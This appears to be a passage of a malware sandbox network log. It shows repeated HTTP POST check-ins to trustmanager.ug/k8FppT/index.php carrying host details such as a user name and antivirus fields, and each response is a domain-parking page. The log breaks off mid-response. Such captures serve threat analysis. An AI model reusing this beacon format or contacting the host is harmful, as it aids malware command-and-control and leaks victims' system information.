Aug 23, 2021 02:09:17.642153978 CEST	18489	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.642174959 CEST	18489	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:17.765731096 CEST	18545	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:17.792013884 CEST	18546	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.792035103 CEST	18546	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:17.908144951 CEST	18547	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:17.934756041 CEST	18549	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:17.934787035 CEST	18549	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:18.116079092 CEST	18563	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:18.142277002 CEST	18565	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img 